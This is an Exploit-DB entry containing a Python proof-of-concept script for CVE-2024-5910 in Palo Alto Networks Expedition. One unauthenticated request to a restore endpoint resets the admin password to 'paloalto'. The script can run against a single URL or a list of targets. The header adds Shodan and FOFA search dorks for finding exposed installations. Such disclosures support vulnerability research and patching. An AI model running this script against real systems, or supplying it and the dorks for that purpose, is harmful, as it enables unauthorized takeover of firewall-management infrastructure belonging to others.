Palo Alto Networks Expedition 1.2.90.1 - Admin Account Takeover

EDB-ID:

52129




Platform:

Multiple

Date:

2025-04-06


################################################################################################
############################                                                                   #
#- Exploit Title: PoC for Admin Account Password Reset of Palo Alto Networks Expedition tool   #
#- Shodan Dork: html:"expedition project"                                                      #     
#- FOFA Dork: "expedition project" && icon_hash="1499876150"                                   #
#- Exploit Author: ByteHunter                                                                  #
#- Email: 0xByteHunter@proton.me                                                               #
#- Vulnerable Versions: 1.2 < 1.2.92                                                           #
#- Tested on: 1.2.90.1 & 1.2.75                                                                #
#- CVE : CVE-2024-5910                                                                         #                             
############################                                                                   #  
################################################################################################ 

import requests
import argparse
import warnings

from requests.packages.urllib3.exceptions import InsecureRequestWarning
warnings.simplefilter("ignore", InsecureRequestWarning)

ENDPOINT = '/OS/startup/restore/restoreAdmin.php'

def send_request(base_url):
    url = f"{base_url}{ENDPOINT}"
    print(f"Testing URL: {url}")  
    try:
        response = requests.get(url, verify=False, timeout=7) 
        if response.status_code == 200:
            print("✓ Admin password restored to: 'paloalto'\n")
            print("✓ admin panel is now accessable via ==> admin:paloalto creds")
        else:
            print(f"Request failed with status code: {response.status_code}\n")
    except requests.exceptions.RequestException as e:
        print(f"Error sending request to {url}") #{e}

def main():
    parser = argparse.ArgumentParser(description='Palo Alto Expedition - Admin Account Password Reset PoC')
    parser.add_argument('-u', '--url', type=str, help='single target URL')
    parser.add_argument('-l', '--list', type=str, help='URL target list')

    args = parser.parse_args()

    if args.url:
        send_request(args.url)
    elif args.list:
        try:
            with open(args.list, 'r') as file:
                urls = file.readlines()
                for base_url in urls:
                    send_request(base_url.strip())
        except FileNotFoundError:
            print(f"File not found: {args.list}")
    else:
        print("I need a URL address with -u or a URL file list with -l.")

if __name__ == '__main__':
    main()